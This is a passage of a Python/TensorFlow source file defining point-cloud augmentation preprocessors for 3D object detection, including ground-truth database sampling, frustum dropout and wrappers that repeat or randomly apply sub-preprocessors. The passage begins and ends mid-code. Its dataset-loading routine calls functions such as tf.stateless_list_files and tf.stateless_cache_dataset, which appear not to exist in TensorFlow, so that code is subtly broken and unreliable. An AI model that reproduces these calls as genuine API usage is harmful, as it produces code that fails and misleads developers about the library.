        [random_translate_x, random_translate_y, random_translate_z], axis=1)

    fg_xyz, fg_feature = self._Foreground(features, points_xyz, points_feature,
                                          real_bboxes_3d, points_in_bbox_mask,
                                          rotation, translate_pose, Transform)

    # Concatenate them with the background points and features.
    bg_xyz, bg_feature = self._Background(points_xyz, points_feature,
                                          points_in_bbox_mask)
    all_points = tf.concat([bg_xyz, fg_xyz], axis=0)
    all_features = tf.concat([bg_feature, fg_feature], axis=0)

    # Shuffle the points/features randomly.
    all_points, all_features = _ConsistentShuffle((all_points, all_features),
                                                  p.random_seed)

    # Padding should technically be unnecessary: the number of points before and
    # after should be the same, but in practice we sometimes seem to drop a few
    # points, and so we pad to make the shape fixed.
    #
    # TODO(vrv): Identify the source of this problem and then assert a shape
    # matching check.
    if 'points_padding' in features.lasers:
      features.lasers.points_xyz = py_utils.PadOrTrimTo(
          all_points, tf.shape(features.lasers.points_xyz))
      features.lasers.points_feature = py_utils.PadOrTrimTo(
          all_features, tf.shape(features.lasers.points_feature))
      total_points = tf.shape(all_points)[0]
      features.lasers.points_padding = 1.0 - py_utils.PadOrTrimTo(
          tf.ones([total_points]), tf.shape(features.lasers.points_padding))
    else:
      features.lasers.points_xyz = all_points
      features.lasers.points_feature = all_features

    # Translate noise.
    bboxes_xyz = real_bboxes_3d[..., :3]
    bboxes_xyz += translate_pose[..., :3]

    bboxes_dim = real_bboxes_3d[..., 3:6]
    # Rotate bboxes by their corresponding rotation.
    bboxes_rot = real_bboxes_3d[..., 6:]
    bboxes_rot -= rotation[:, tf.newaxis]
    features.labels.bboxes_3d = py_utils.PadOrTrimTo(
        tf.concat([bboxes_xyz, bboxes_dim, bboxes_rot], axis=-1),
        tf.shape(features.labels.bboxes_3d))
    features.labels.bboxes_3d_mask = py_utils.PadOrTrimTo(
        tf.ones(tf.shape(real_bboxes_3d)[0]),
        tf.shape(features.labels.bboxes_3d_mask))
    return features

  def TransformShapes(self, shapes):
    return shapes

  def TransformDTypes(self, dtypes):
    return dtypes
class GroundTruthAugmentor(Preprocessor):
  """Augment bounding box labels and points from a database.

  This preprocessor expects features to contain the following keys:
    lasers.points_xyz of shape [P, 3]
    lasers.points_feature of shape [P, F]
    lasers.points_padding of shape [P]
    labels.bboxes_3d of shape [L, 7]
    labels.bboxes_3d_mask of shape [L]
    labels.labels of shape [L]

  Modifies the above features so that additional objects from
  a groundtruth database are added.
  """

  @classmethod
  def Params(cls):
    p = super().Params()
    p.Define(
        'groundtruth_database', None,
        'If not None, loads groundtruths from this database and adds '
        'them to the current scene. Groundtruth database is expected '
        'to be a TFRecord of KITTI or Waymo crops.')
    # Fixed: 'efficiencly' typo in the help string below.
    p.Define(
        'num_db_objects', None,
        'Number of objects in the database. Because we use TFRecord '
        'we cannot easily query the number of objects efficiently.')
    p.Define('max_num_points_per_bbox', 2048,
             'Maximum number of points in each bbox to augment with.')
    p.Define(
        'filter_min_points', 0,
        'Minimum number of points each database object must have '
        'to be included in an example.')
    p.Define(
        'filter_max_points', None,
        'Maximum number of points each database object must have '
        'to be included in an example.')
    p.Define(
        'difficulty_sampling_probability', None,
        'Probability for sampling ground truth example whose difficulty '
        'equals {0, 1, 2, 3, ...}. Example: [1.0, 1.0, 1.0, 1.0] for '
        'uniform sampling 4 different difficulties. Default value is '
        'None = uniform sampling for all difficulties.')
    p.Define(
        'class_sampling_probability', None,
        'Probability for sampling ground truth example based on its class index'
        ' Example: For KITTI classes are [Background, Car, Van, Truck, '
        'Pedestrian, Person_sitting, Cyclist, Tram, Misc, DontCare], using '
        'probability vector [0., 1.0, 1.0, 0., 0., 0., 0.,0., 0., 0.], we '
        'uniformly sampling Car and Van. Default value is None: Uses '
        'label_filter flag and does not sample based on class.')
    p.Define('filter_min_difficulty', 0,
             'Filter ground truth boxes whose difficulty is < this value.')
    p.Define('max_augmented_bboxes', 15,
             'Maximum number of augmented bounding boxes per scene.')
    p.Define(
        'label_filter', [],
        'A list where if specified, only examples of these label integers will '
        'be included in an example.')
    # Fixed: fused words ('wholegroundtruth', 'memoryusage') in the literals
    # below, which previously lacked separating spaces at the joins.
    p.Define(
        'batch_mode', False, 'Bool value to control whether the whole '
        'groundtruth database is loaded or partially loaded to save memory '
        'usage. Setting to False loads the whole ground truth database into '
        'memory. Otherwise, only a fraction of the data will be loaded into '
        'the memory.')
    return p

  def _ReadDB(self, file_patterns):
    """Read the groundtruth database and return as a NestedMap of Tensors."""
    p = self.params

    def Process(record):
      """Process a groundtruth record.

      Args:
        record: a serialized tf.Example proto string.

      Returns:
        Tuple of (points, features, points_mask, bboxes_3d, label, difficulty)
        with the point tensors padded/trimmed to p.max_num_points_per_bbox.
      """
      feature_map = {
          'num_points': tf.io.FixedLenFeature((), tf.int64, 0),
          'points': tf.io.VarLenFeature(dtype=tf.float32),
          'points_feature': tf.io.VarLenFeature(dtype=tf.float32),
          'bbox_3d': tf.io.VarLenFeature(dtype=tf.float32),
          'label': tf.io.FixedLenFeature((), tf.int64, 0),
          'difficulty': tf.io.FixedLenFeature((), tf.int64, 0),
          'text': tf.io.VarLenFeature(dtype=tf.string),
      }

      example_data = tf.io.parse_single_example(record, feature_map)
      num_points = example_data['num_points']

      points = tf.reshape(_Dense(example_data['points']), [num_points, 3])
      features = tf.reshape(
          _Dense(example_data['points_feature']), [num_points, 1])
      points_mask = tf.ones(num_points, dtype=tf.bool)

      # TODO(vrv): Use random selection instead of first N points.
      points = py_utils.PadOrTrimTo(points, [p.max_num_points_per_bbox, 3])
      features = py_utils.PadOrTrimTo(features, [p.max_num_points_per_bbox, 1])
      points_mask = py_utils.PadOrTrimTo(points_mask,
                                         [p.max_num_points_per_bbox])

      bboxes_3d = tf.reshape(_Dense(example_data['bbox_3d']), [7])
      label = tf.cast(example_data['label'], tf.int32)
      difficulty = tf.cast(example_data['difficulty'], tf.int32)
      return (points, features, points_mask, bboxes_3d, label, difficulty)

    if p.batch_mode:
      # Prepare dataset for ground truth bounding boxes. Randomly shuffle the
      # file patterns.
      file_count = len(tf.io.gfile.glob(file_patterns))
      dataset = tf.stateless_list_files(file_patterns)
      dataset = dataset.apply(tf.stateless_cache_dataset())
      dataset = dataset.apply(
          tf.stateless_shuffle_dataset(
              buffer_size=file_count, reshuffle_each_iteration=True))
      dataset = dataset.interleave(
          tf.data.TFRecordDataset, cycle_length=10, num_parallel_calls=10)
      dataset = dataset.repeat()
      # Only prefetch a few objects from the database to reduce memory
      # consumption.
      dataset = dataset.map(Process, num_parallel_calls=10)
      # We need more bboxes than max_augmented_bboxes in a batch, because some
      # of the boxes are filtered out.
      dataset = dataset.batch(p.max_augmented_bboxes * 10)
      dataset = dataset.apply(tf.stateless_cache_dataset()).prefetch(
          p.max_augmented_bboxes * 30)
    else:
      # Prepare dataset for ground truth bounding boxes.
      dataset = tf.stateless_list_files(file_patterns)
      dataset = dataset.interleave(
          tf.data.TFRecordDataset, cycle_length=10, num_parallel_calls=10)
      # Read the entire dataset into memory.
      dataset = dataset.take(p.num_db_objects)
      dataset = dataset.map(Process, num_parallel_calls=10)
      # We batch the output of the dataset into a very large Tensor, then cache
      # it in memory.
      dataset = dataset.batch(p.num_db_objects)
      dataset = dataset.apply(tf.stateless_cache_dataset()).repeat()

    iterator = dataset.make_one_shot_iterator()
    input_batch = iterator.get_next()

    (db_points_xyz, db_points_feature, db_points_mask, db_bboxes, db_labels,
     db_difficulties) = input_batch
    return py_utils.NestedMap(
        points_xyz=db_points_xyz,
        points_feature=db_points_feature,
        points_mask=db_points_mask,
        bboxes_3d=db_bboxes,
        labels=db_labels,
        difficulties=db_difficulties)

  def _CreateExampleFilter(self, db):
    """Construct db example filter.

    Args:
      db: NestedMap of the following Tensors: points_mask - [N, P] - The points
        mask for every object in the database, where N is the number of objects
        and P is the maximum number of points per object. labels - [N] - int32
        Label for each object in the database. difficulties - [N] - int32
        Difficulty for each label in the database.

    Returns:
      A [N] boolean Tensor for each object in the database, True if
      that corresponding object passes the filter.
    """
    p = self.params
    db_points_mask = db.points_mask
    db_label = db.labels
    db_difficulty = db.difficulties

    num_objects_in_database = tf.shape(db_points_mask)[0]

    # Filter number of objects.
    points_per_object = tf.reduce_sum(tf.cast(db_points_mask, tf.int32), axis=1)
    example_filter = points_per_object >= p.filter_min_points
    if p.filter_max_points:
      example_filter = tf.math.logical_and(
          example_filter, points_per_object <= p.filter_max_points)

    if p.difficulty_sampling_probability is not None:
      # Sample db based on difficulty of each example.
      sampling_prob = p.difficulty_sampling_probability
      db_difficulty_probability = tf.zeros_like(db_difficulty, dtype=tf.float32)
      for difficulty_idx, difficulty_prob in enumerate(sampling_prob):
        db_difficulty_probability += (
            tf.cast(tf.equal(db_difficulty, difficulty_idx), tf.float32) *
            difficulty_prob)

      sampled_filter = tf.random.uniform(
          tf.shape(example_filter),
          minval=0,
          maxval=1,
          dtype=tf.float32,
          seed=p.random_seed)
      sampled_filter = sampled_filter < db_difficulty_probability
      example_filter &= sampled_filter
    else:
      # Filter out db examples below min difficulty
      example_filter = tf.math.logical_and(
          example_filter, db_difficulty >= p.filter_min_difficulty)

    example_filter = tf.reshape(example_filter, [num_objects_in_database])
    db_label = tf.reshape(db_label, [num_objects_in_database])
    if p.class_sampling_probability is not None:
      # Sample example based on its class probability.
      sampling_prob = p.class_sampling_probability
      db_class_probability = tf.zeros_like(db_label, dtype=tf.float32)

      for class_idx, class_prob in enumerate(sampling_prob):
        db_class_probability += (
            tf.cast(tf.equal(db_label, class_idx), tf.float32) * class_prob)

      sampled_filter = tf.random.uniform(
          tf.shape(example_filter),
          minval=0,
          maxval=1,
          dtype=tf.float32,
          seed=p.random_seed)
      sampled_filter = sampled_filter < db_class_probability
      example_filter &= sampled_filter
    elif p.label_filter:
      # Filter based on labels.
      # Create a label filter where all is false
      valid_labels = tf.constant(p.label_filter)
      label_mask = tf.reduce_any(
          tf.equal(db_label[..., tf.newaxis], valid_labels), axis=1)
      example_filter = tf.math.logical_and(example_filter, label_mask)
    return example_filter

  # TODO(vrv): Create an overlap filter that also ensures that boxes don't
  # overlap with groundtruth points, so that the scenes are more plausible.
  def _FilterIndices(self, gt_bboxes_3d, db_bboxes, db_idx):
    """Identify database boxes that don't overlap with other boxes."""
    # We accomplish overlap filtering by first computing the pairwise 3D IoU of
    # all boxes (concatenated) as a way of computing pairwise box overlaps.
    num_gt_bboxes = tf.shape(gt_bboxes_3d)[0]
    filtered_bboxes = tf.gather(db_bboxes, db_idx)
    all_bboxes = tf.concat([gt_bboxes_3d, filtered_bboxes], axis=0)
    pairwise_overlap = ops.pairwise_iou3d(all_bboxes, all_bboxes)

    # We now have an M x M matrix with 1s on the diagonal and non-zero entries
    # whenever a box collides with another.
    #
    # To increase the number of boxes selected, we filter the upper triangular
    # entries so that the boxes are chosen greedily: boxes with smaller indices
    # will be selected before later boxes, because earlier boxes will not appear
    # to collide with later boxes, but later boxes may collide with earlier
    # ones.
    pairwise_overlap = tf.linalg.band_part(pairwise_overlap, -1, 0)

    # We compute the sum of the IoU overlaps for all database boxes.
    db_overlap_sums = tf.reduce_sum(pairwise_overlap[num_gt_bboxes:], axis=1)

    # Those boxes that don't overlap with any other boxes will only have
    # a 1.0 IoU with itself.
    non_overlapping_boxes = tf.reshape(db_overlap_sums <= 1., [-1])

    # Filter to select only those object ids that pass this filter.
    db_idx = tf.boolean_mask(db_idx, non_overlapping_boxes)
    return db_idx

  def TransformFeatures(self, features):
    """Samples non-overlapping database objects into the current scene."""
    p = self.params

    tf.logging.info('Loading groundtruth database at %s' %
                    (p.groundtruth_database))
    db = p.groundtruth_database.Instantiate().BuildDataSource(self._ReadDB).data

    original_features_shape = tf.shape(features.lasers.points_feature)

    # Compute the number of bboxes to augment.
    num_bboxes_in_scene = tf.reduce_sum(
        tf.cast(features.labels.bboxes_3d_mask, tf.int32))
    max_bboxes = tf.shape(features.labels.bboxes_3d_mask)[0]
    num_augmented_bboxes = tf.minimum(max_bboxes - num_bboxes_in_scene,
                                      p.max_augmented_bboxes)

    # Compute an object index over all objects in the database.
    num_objects_in_database = tf.shape(db.points_xyz)[0]
    db_idx = tf.range(num_objects_in_database)

    # Find those indices whose examples pass the filters, and select only those
    # indices.
    example_filter = self._CreateExampleFilter(db)
    db_idx = tf.boolean_mask(db_idx, example_filter)

    # At this point, we might still have a large number of object candidates,
    # from which we only need a sample.
    # To reduce the amount of computation, we randomly subsample to slightly
    # more than we want to augment.
    db_idx = tf.random.shuffle(
        db_idx, seed=p.random_seed)[0:num_augmented_bboxes * 5]

    # After filtering, further filter out the db boxes that would occlude with
    # other boxes (including other database boxes).
    #
    # Gather the filtered ground truth bounding boxes according to the mask, so
    # we can compute overlaps below.
    gt_bboxes_3d_mask = tf.cast(features.labels.bboxes_3d_mask, tf.bool)
    gt_bboxes_3d = tf.boolean_mask(features.labels.bboxes_3d, gt_bboxes_3d_mask)
    gt_bboxes_3d = py_utils.HasShape(gt_bboxes_3d, [num_bboxes_in_scene, 7])
    db_idx = self._FilterIndices(gt_bboxes_3d, db.bboxes_3d, db_idx)

    # From the filtered object ids, select only as many boxes as we need.
    shuffled_idx = db_idx[0:num_augmented_bboxes]
    num_augmented_bboxes = tf.shape(shuffled_idx)[0]

    # Gather based off the indices.
    sampled_points_xyz = tf.gather(db.points_xyz, shuffled_idx)
    sampled_points_feature = tf.gather(db.points_feature, shuffled_idx)
    sampled_mask = tf.reshape(
        tf.gather(db.points_mask, shuffled_idx),
        [num_augmented_bboxes, p.max_num_points_per_bbox])
    sampled_bboxes = tf.gather(db.bboxes_3d, shuffled_idx)
    sampled_labels = tf.gather(db.labels, shuffled_idx)

    # Mask points/features.
    sampled_points_xyz = tf.boolean_mask(sampled_points_xyz, sampled_mask)
    sampled_points_feature = tf.boolean_mask(sampled_points_feature,
                                             sampled_mask)

    # Flatten before concatenation with ground truths.
    sampled_points_xyz = tf.reshape(sampled_points_xyz, [-1, 3])
    sampled_points_feature = tf.reshape(sampled_points_feature,
                                        [-1, original_features_shape[-1]])
    sampled_bboxes = tf.reshape(sampled_bboxes, [-1, 7])

    # Concatenate the samples with the ground truths.
    if 'points_padding' in features.lasers:
      points_mask = tf.cast(1. - features.lasers.points_padding, tf.bool)
      # Densify the original points.
      dense_points_xyz = tf.boolean_mask(features.lasers.points_xyz,
                                         points_mask)
      dense_points_feature = tf.boolean_mask(features.lasers.points_feature,
                                             points_mask)

      # Concatenate the dense original points with our new sampled points.
      points_xyz = tf.concat([dense_points_xyz, sampled_points_xyz], axis=0)
      points_feature = tf.concat([dense_points_feature, sampled_points_feature],
                                 axis=0)
      original_points_shape = tf.shape(features.lasers.points_xyz)
      features.lasers.points_xyz = py_utils.PadOrTrimTo(points_xyz,
                                                        original_points_shape)
      features.lasers.points_feature = py_utils.PadOrTrimTo(
          points_feature, original_features_shape)
      # Compute the modified mask / padding.
      final_points_mask = py_utils.PadOrTrimTo(
          tf.ones(tf.shape(points_xyz)[0]),
          tf.shape(features.lasers.points_padding))
      features.lasers.points_padding = 1. - final_points_mask
    else:
      points_xyz = tf.concat([features.lasers.points_xyz, sampled_points_xyz],
                             axis=0)
      points_feature = tf.concat(
          [features.lasers.points_feature, sampled_points_feature], axis=0)
      features.lasers.points_xyz = points_xyz
      features.lasers.points_feature = points_feature

    # Reconstruct a new, dense, bboxes_3d vector that includes the filtered
    # groundtruth bounding boxes followed by the database augmented boxes.
    bboxes_3d = tf.concat([gt_bboxes_3d, sampled_bboxes], axis=0)
    bboxes_3d = py_utils.PadOrTrimTo(bboxes_3d, [max_bboxes, 7])
    features.labels.bboxes_3d = bboxes_3d
    bboxes_3d_mask = tf.ones(
        num_bboxes_in_scene + num_augmented_bboxes, dtype=tf.float32)
    features.labels.bboxes_3d_mask = py_utils.PadOrTrimTo(
        bboxes_3d_mask, [max_bboxes])

    gt_labels = tf.boolean_mask(features.labels.labels, gt_bboxes_3d_mask)
    gt_labels = py_utils.HasShape(gt_labels, [num_bboxes_in_scene])

    labels = tf.concat([gt_labels, sampled_labels], axis=0)
    features.labels.labels = py_utils.PadOrTrimTo(labels, [max_bboxes])
    return features

  def TransformShapes(self, shapes):
    return shapes

  def TransformDTypes(self, dtypes):
    return dtypes
class FrustumDropout(Preprocessor):
  """Randomly drops out points in a frustum.
  All points are first converted to spherical coordinates, and then a point
  is randomly selected. All points in the frustum around that point within
  a given phi, theta angle width and distance to the original greater than
  a given value are dropped with probability = 1 - keep_prob.
  Here, we can specify whether the dropped frustum is the union or intersection
  of the phi and theta angle filters.
  This preprocessor expects features to contain the following keys:
  - lasers.points_xyz of shape [P, 3]
  - lasers.points_feature of shape [P, F]
  Optionally points_padding of shape [P] corresponding to the padding.
  if points_padding is None, then all points are considered valid.
  Modifies the following features:
  lasers.points_xyz, lasers.points_feature, lasers.points_padding with points
  randomly dropped out.
  """
  @classmethod
  def Params(cls):
    p = super().Params()
    p.Define('theta_width', 0.03, 'Theta angle width for dropping points.')
    p.Define('phi_width', 0.0, 'Phi angle width for dropping points.')
    p.Define(
        'distance', 0.0, 'Drop points that have larger distance to the'
        'origin than the value given here.')
    p.Define(
        'keep_prob', 0.0, 'keep_prob: 1. = drop no points in the Frustum,'
        '0 = drop all points, between 0 and 1 = down sample the points.')
    p.Define(
        'drop_type', 'union', 'Drop either the union or intersection of '
        'phi width and theta width.')
    return p
  def __init__(self, params):
    """Validates parameter ranges at construction time.

    Raises:
      ValueError: if phi_width, theta_width or distance is negative, if
        keep_prob is outside [0, 1], or if drop_type is not one of
        'union' / 'intersection'.
    """
    super().__init__(params)
    p = self.params
    if p.phi_width < 0:
      raise ValueError('phi_width must be >= 0, phi_width={}'.format(
          p.phi_width))
    if p.theta_width < 0:
      raise ValueError('theta_width must be >= 0, theta_width={}'.format(
          p.theta_width))
    if p.distance < 0:
      raise ValueError('distance must be >= 0, distance={}'.format(p.distance))
    if p.keep_prob < 0 or p.keep_prob > 1:
      raise ValueError('keep_prob must be >= 0 and <=1, keep_prob={}'.format(
          p.keep_prob))
    if p.drop_type not in ['union', 'intersection']:
      raise ValueError('drop_type must be union or intersection ,'
                       'drop_type={}'.format(p.drop_type))
  def TransformFeatures(self, features):
    p = self.params
    points_xyz = features.lasers.points_xyz
    points_feature = features.lasers.points_feature
    if 'points_padding' in features.lasers:
      points_padding = features.lasers.points_padding
    else:
      points_padding = None
    if points_padding is not None:
      # Valid points have padding == 0.  Remember their indices so that a
      # uniform sample over valid points can be mapped back to an index in
      # the padded tensors.
      points_mask = tf.cast(1 - points_padding, tf.bool)
      num_total_points = py_utils.GetShape(points_mask)[0]
      real_points_idx = tf.boolean_mask(
          tf.range(0, num_total_points, dtype=tf.int32), points_mask)
      num_points = py_utils.GetShape(real_points_idx)[0]
    else:
      # No padding information: every point is treated as valid.
      points_mask = tf.ones_like(points_xyz[:, 0], dtype=tf.bool)
      num_total_points = py_utils.GetShape(points_mask)[0]
      num_points = py_utils.GetShape(points_xyz)[0]
    # Convert to spherical coordinates: r (range), theta, phi per point.
    r, theta, phi = tf.unstack(
        geometry.SphericalCoordinatesTransform(points_xyz), axis=-1)
    def _PickRandomPoint():
      # Returns the index (into the padded tensors) of a uniformly sampled
      # valid point.
      point_idx = tf.random.uniform((),
                                    minval=0,
                                    maxval=num_points,
                                    dtype=tf.int32)
      if points_padding is not None:
        point_idx = real_points_idx[point_idx]
      return point_idx
    # Pick a point at random and drop all points that are near that point in the
    # frustum for distance larger than r; repeat this for both theta and phi.
    if p.theta_width > 0:
      theta_half_width = p.theta_width / 2.
      point_idx = _PickRandomPoint()
      # Points within theta width and further than distance will be dropped.
      theta_drop_filter = ((theta < (theta[point_idx] + theta_half_width)) &
                           (theta > (theta[point_idx] - theta_half_width)) &
                           (r > p.distance))
    else:
      theta_drop_filter = tf.zeros_like(points_mask, dtype=tf.bool)
    if p.phi_width > 0:
      phi_half_width = p.phi_width / 2.
      point_idx = _PickRandomPoint()
      # Points within phi width and further than distance will be dropped.
      phi_drop_filter = ((phi < (phi[point_idx] + phi_half_width)) &
                         (phi >
                          (phi[point_idx] - phi_half_width)) & (r > p.distance))
    else:
      phi_drop_filter = tf.zeros_like(points_mask, dtype=tf.bool)
    # Create drop_filter by combining filters. This contains a filter for the
    # points to be removed. One can use the intersection method to limit the
    # dropped points be within both phi and theta ranges.
    if p.drop_type == 'union':
      drop_filter = theta_drop_filter | phi_drop_filter
    elif p.drop_type == 'intersection':
      drop_filter = theta_drop_filter & phi_drop_filter
    if p.keep_prob == 0:
      # Drop all points in drop_filter.
      down_sampling_filter = drop_filter
    else:
      # Randomly drop points in drop_filter based on keep_prob.
      sampling_drop_filter = tf.random.uniform([num_total_points],
                                               minval=0,
                                               maxval=1,
                                               dtype=tf.float32)
      # Points greater than the threshold (keep_prob) will be dropped.
      sampling_drop_filter = sampling_drop_filter > p.keep_prob
      # Instead of dropping all points in the frustum, we drop out points
      # that are in the selected frustum (drop_filter).
      down_sampling_filter = drop_filter & sampling_drop_filter
    # Remove the dropped points from the valid-point mask.
    points_mask &= ~down_sampling_filter
    if points_padding is not None:
      # Tensors stay dense; dropped points are marked via the padding only.
      features.lasers.points_padding = 1 - tf.cast(points_mask, tf.float32)
    else:
      # No padding available, so physically remove the dropped points.
      features.lasers.points_xyz = tf.boolean_mask(points_xyz, points_mask)
      features.lasers.points_feature = tf.boolean_mask(points_feature,
                                                       points_mask)
    return features
  def TransformShapes(self, shapes):
    return shapes
  def TransformDTypes(self, dtypes):
    return dtypes
class RepeatPreprocessor(Preprocessor):
  """Applies a single wrapped preprocessor a fixed number of times.

  The preprocessor configured via `subprocessor` is run `repeat_count` times
  in sequence over the features, and correspondingly over shapes and dtypes.
  """

  @classmethod
  def Params(cls):
    p = super().Params()
    p.Define('repeat_count', 1, 'Number of times the subprocessor is applied to'
             ' features.')
    p.Define('subprocessor', None, 'One of the input preprocessors.')
    return p

  def __init__(self, params):
    """Validates params and instantiates the wrapped subprocessor.

    Raises:
      ValueError: if no subprocessor is given, or repeat_count is not a
        non-negative int.
    """
    super().__init__(params)
    subprocessor_params = self.params.subprocessor
    repeat_count = self.params.repeat_count
    if subprocessor_params is None:
      raise ValueError('No subprocessor was specified for RepeatPreprocessor.')
    if repeat_count < 0 or not isinstance(repeat_count, int):
      raise ValueError(
          'repeat_count must be >= 0 and int, repeat_count={}'.format(
              repeat_count))
    self.CreateChild('subprocessor', subprocessor_params)

  def TransformFeatures(self, features):
    """Applies the subprocessor to `features` repeat_count times."""
    for _ in range(self.params.repeat_count):
      features = self.subprocessor.FPropDefaultTheta(features)
    return features

  def TransformShapes(self, shapes):
    """Applies the subprocessor's shape transform repeat_count times."""
    for _ in range(self.params.repeat_count):
      shapes = self.subprocessor.TransformShapes(shapes)
    return shapes

  def TransformDTypes(self, dtypes):
    """Applies the subprocessor's dtype transform repeat_count times."""
    for _ in range(self.params.repeat_count):
      dtypes = self.subprocessor.TransformDTypes(dtypes)
    return dtypes
class RandomApplyPreprocessor(Preprocessor):
  """Randomly applies a subprocessor with a given probability.

  The wrapped `subprocessor` is applied to the features with probability
  `prob`; otherwise the features pass through unchanged. Because the choice
  is made inside a `tf.cond`, the subprocessor must not alter the declared
  shapes or dtypes; this is verified by TransformShapes/TransformDTypes.
  """

  @classmethod
  def Params(cls):
    p = super().Params()
    p.Define('prob', 1.0, 'The probability the subprocessor being executed.')
    p.Define('subprocessor', None, 'Params for an input preprocessor.')
    return p

  def __init__(self, params):
    """Validates params and instantiates the wrapped subprocessor.

    Raises:
      ValueError: if no subprocessor is given, or prob is not a float in
        [0, 1].
    """
    super().__init__(params)
    p = self.params
    if p.subprocessor is None:
      # Fixed: this message previously named RepeatPreprocessor (copy/paste).
      raise ValueError(
          'No subprocessor was specified for RandomApplyPreprocessor.')
    if p.prob < 0 or p.prob > 1 or not isinstance(p.prob, float):
      raise ValueError(
          'prob must be >= 0 and <=1 and float type, prob={}'.format(p.prob))
    self.CreateChild('subprocessor', p.subprocessor)

  def TransformFeatures(self, features):
    """Applies the subprocessor to `features` with probability p.prob."""
    p = self.params
    choice = tf.random.uniform(
        (), minval=0.0, maxval=1.0, seed=p.random_seed) <= p.prob
    # Features is passed downstream and may be modified, we make deep copies
    # here to use with tf.cond to avoid having tf.cond access updated
    # versions. Note that we need one copy for each branch in case the branches
    # further modify features.
    features_0, features_1 = features.DeepCopy(), features.DeepCopy()
    features = tf.cond(choice,
                       lambda: self.subprocessor.TransformFeatures(features_0),
                       lambda: features_1)
    return features

  def TransformShapes(self, shapes):
    """Checks that the subprocessor leaves the declared shapes unchanged."""
    shapes_transformed = self.subprocessor.TransformShapes(shapes)

    if not shapes.IsCompatible(shapes_transformed):
      # Fixed: the two string literals previously concatenated to
      # 'transformedshapes' (missing space).
      raise ValueError(
          'NestedMap structures are different between shapes and transformed '
          'shapes. Original shapes: {}. Transformed shapes: {}'.format(
              shapes, shapes_transformed))

    def IsCompatibleWith(a, b):
      return a.is_compatible_with(b)

    if not all(
        py_utils.Flatten(
            py_utils.Transform(IsCompatibleWith, shapes, shapes_transformed))):
      raise ValueError(
          'Shapes after transformation - {} are different from original '
          'shapes - {}.'.format(shapes_transformed, shapes))
    return shapes

  def TransformDTypes(self, dtypes):
    """Checks that the subprocessor leaves the declared dtypes unchanged."""
    transformed_dtypes = self.subprocessor.TransformDTypes(dtypes)
    if transformed_dtypes != dtypes:
      raise ValueError(
          'DTypes after transformation of preprocessor - {} should be '
          'the same as {}, but get {}.'.format(self.params.subprocessor, dtypes,
                                               transformed_dtypes))
    return dtypes
class ConstantPreprocessor(Preprocessor):
  """Inserts configured constant values into the nested feature output."""

  @classmethod
  def Params(cls):
    p = super().Params()
    p.Define(
        'constants', py_utils.NestedMap(),
        'Map of key names to numpy arrays of constant values to use. '
        'Must be a NestedMap or dict convertible to NestedMap.')
    return p

  def _ConstantsMap(self):
    """Returns the configured constants wrapped as a NestedMap."""
    return py_utils.NestedMap(self.params.constants)

  def TransformFeatures(self, features):
    """Adds each configured constant to `features` as a tf.constant."""
    features.update(self._ConstantsMap().Transform(tf.constant))
    return features

  def TransformShapes(self, shapes):
    """Declares the static shape of each configured constant."""

    def _ShapeOf(value):
      return tf.TensorShape(np.array(value).shape)

    shapes.update(self._ConstantsMap().Transform(_ShapeOf))
    return shapes

  def TransformDTypes(self, dtypes):
    """Declares the dtype of each configured constant."""

    def _DTypeOf(value):
      return tf.as_dtype(np.array(value).dtype)

    dtypes.update(self._ConstantsMap().Transform(_DTypeOf))
    return dtypes
class IdentityPreprocessor(Preprocessor):
  """A pass-through preprocessor that leaves every input untouched.

  Handy wherever a 'no-op' preprocessor is required, for example as one of
  the options handed to a random-choice preprocessor so that 'do nothing'
  can be selected.
  """

  def TransformFeatures(self, features):
    """Returns `features` unchanged."""
    return features

  def TransformShapes(self, shapes):
    """Returns `shapes` unchanged."""
    return shapes

  def TransformDTypes(self, dtypes):
    """Returns `dtypes` unchanged."""
    return dtypes
class RandomChoicePreprocessor(Preprocessor):
  """Randomly applies one of a set of preprocessors, with specified weights.

  Each entry of `subprocessors` pairs a preprocessor Params with a schedule
  Params; the schedule yields that preprocessor's relative (unnormalized)
  selection weight at the current step.

  For example, with two subprocessors whose schedules currently yield
  weights [1., 2.], the first is applied with probability 1/3 and the
  second with probability 2/3.
  """

  @classmethod
  def Params(cls):
    p = super().Params()
    p.Define(
        'subprocessors', [],
        'Params for preprocessors. Each value should be a tuple of '
        '(Preprocessor.Params(), BaseSchedule.Params()), where the schedule '
        'defines the weights to use over time.')
    return p

  def __init__(self, params):
    """Validates the (preprocessor, schedule) pairs and creates children.

    Raises:
      ValueError: if `subprocessors` is empty.
      TypeError: if any schedule entry is not a schedule Params.
    """
    super().__init__(params)
    p = self.params
    if not p.subprocessors:
      raise ValueError('No subprocessors were specified.')

    subprocessors, schedules = zip(*p.subprocessors)

    def _FilterNonSchedules(v):
      """Returns True when `v` is not a schedule Params."""
      # Fixed: getattr(v, 'cls', False) could hand a non-class to issubclass,
      # which raises TypeError instead of producing the intended error below.
      # Guard with isinstance(..., type) so malformed entries are reported.
      v_cls = getattr(v, 'cls', None)
      return not (isinstance(v_cls, type) and
                  issubclass(v_cls, schedule.BaseSchedule))

    invalid_values = [_FilterNonSchedules(s) for s in schedules]
    if any(invalid_values):
      raise TypeError('Not all schedule values were schedules: '
                      f'{invalid_values}')

    self.CreateChildren('subprocessors', list(subprocessors))
    self.CreateChildren('schedules', list(schedules))

  def TransformFeatures(self, features):
    """Samples one subprocessor by weight and applies it to `features`."""
    p = self.params

    choice_list = []
    weight_list = []

    # Pass a unique copy of the input to each branch, in case the
    # subprocessor destructively modifies the features in unexpected ways.
    for subp, sched in zip(self.subprocessors, self.schedules):
      choice_list.append(
          lambda subp=subp: subp.TransformFeatures(features.DeepCopy()))
      weight_list.append(sched.Value())

    weight_tensor = tf.stack(weight_list)
    # Sample a branch index proportional to the (unnormalized) weights.
    chosen_bin = tf.random.categorical(
        tf.math.log(weight_tensor[tf.newaxis]),
        1,
        seed=p.random_seed,
        dtype=tf.int32)[0, 0]
    features = tf.switch_case(chosen_bin, branch_fns=choice_list)
    return features

  def TransformShapes(self, shapes):
    """Checks all subprocessors declare identical shapes and returns them."""
    transformed_shapes = [
        subp.TransformShapes(shapes.DeepCopy()) for subp in self.subprocessors
    ]
    if not all(transformed_shapes[0] == curr for curr in transformed_shapes):
      raise ValueError('Shapes after transformations were not identical: '
                       f'{transformed_shapes}')
    return transformed_shapes[0]

  def TransformDTypes(self, dtypes):
    """Checks all subprocessors declare identical dtypes and returns them."""
    transformed_dtypes = [
        subp.TransformDTypes(dtypes.DeepCopy()) for subp in self.subprocessors
    ]
    if not all(transformed_dtypes[0] == curr for curr in transformed_dtypes):
      raise ValueError('DTypes after transformations were not identical: '
